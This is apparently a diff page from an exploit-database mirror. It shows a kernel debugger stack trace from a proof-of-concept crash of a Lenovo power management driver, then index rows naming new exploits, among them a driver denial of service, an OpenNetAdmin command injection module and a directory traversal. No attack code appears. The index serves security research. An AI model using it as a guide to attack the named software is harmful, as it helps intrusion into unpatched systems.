rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40
|
||||||
|
r14=0000000000000002 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!NtQueryInformationFile+0x1071:
|
||||||
|
fffff804`1f6abb11 448bf0 mov r14d,eax
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
|
||||||
|
0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc
|
||||||
|
rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0
|
||||||
|
rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc
|
||||||
|
r14=0000000000000000 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!NtClose+0xffc:
|
||||||
|
fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663)
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
|
||||||
|
0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56
|
||||||
|
rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
|
||||||
|
rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
|
||||||
|
r14=0000000000000000 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!NtDeviceIoControlFile+0x56:
|
||||||
|
fffff804`1f64c356 4883c468 add rsp,68h
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
|
||||||
|
0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925
|
||||||
|
rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8
|
||||||
|
rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
|
||||||
|
r14=0000000000000000 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
nt!setjmpex+0x7925:
|
||||||
|
fffff804`1f27a305 0f1f00 nop dword ptr [rax]
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
|
||||||
|
0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844
|
||||||
|
rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8
|
||||||
|
rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c
|
||||||
|
rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c
|
||||||
|
r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020
|
||||||
|
r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010
|
||||||
|
r14=0000000000000000 r15=0000000000000000
|
||||||
|
iopl=0 nv up ei ng nz na pe nc
|
||||||
|
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282
|
||||||
|
00007fff`33aaf844 ?? ???
|
||||||
|
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|
||||||
|
00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx
|
||||||
|
|
||||||
|
# Mitigation
|
||||||
|
|
||||||
|
Update to Lenovo Power Management driver version 1.67.17.48 or higher
|
|
@ -6621,6 +6621,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47767,exploits/windows/dos/47767.py,"Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC)",2019-12-11,SajjadBnd,dos,windows,
|
47767,exploits/windows/dos/47767.py,"Product Key Explorer 4.2.0.0 - 'Key' Denial of Service (PoC)",2019-12-11,SajjadBnd,dos,windows,
|
||||||
47768,exploits/windows/dos/47768.txt,"AppXSvc 17763 - Arbitrary File Overwrite (DoS)",2019-12-11,"Gabor Seljan",dos,windows,
|
47768,exploits/windows/dos/47768.txt,"AppXSvc 17763 - Arbitrary File Overwrite (DoS)",2019-12-11,"Gabor Seljan",dos,windows,
|
||||||
47769,exploits/windows/dos/47769.txt,"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font",2019-12-11,"Google Security Research",dos,windows,
|
47769,exploits/windows/dos/47769.txt,"Adobe Acrobat Reader DC - Heap-Based Memory Corruption due to Malformed TTF Font",2019-12-11,"Google Security Research",dos,windows,
|
||||||
|
47771,exploits/windows/dos/47771.c,"Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)",2019-12-12,"Nassim Asrir",dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -42080,3 +42081,5 @@ id,file,description,date,author,type,platform,port
|
||||||
47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
|
47764,exploits/hardware/webapps/47764.txt,"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery",2019-12-10,LiquidWorm,webapps,hardware,
|
||||||
47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,
|
47765,exploits/hardware/webapps/47765.txt,"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution",2019-12-10,LiquidWorm,webapps,hardware,
|
||||||
47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java,
|
47770,exploits/java/webapps/47770.txt,"Apache Olingo OData 4.0 - XML External Entity Injection",2019-12-11,"Compass Security",webapps,java,
|
||||||
|
47772,exploits/php/webapps/47772.rb,"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)",2019-12-12,"Onur ER",webapps,php,
|
||||||
|
47773,exploits/php/webapps/47773.txt,"Bullwark Momentum Series JAWS 1.0 - Directory Traversal",2019-12-12,"numan türle",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue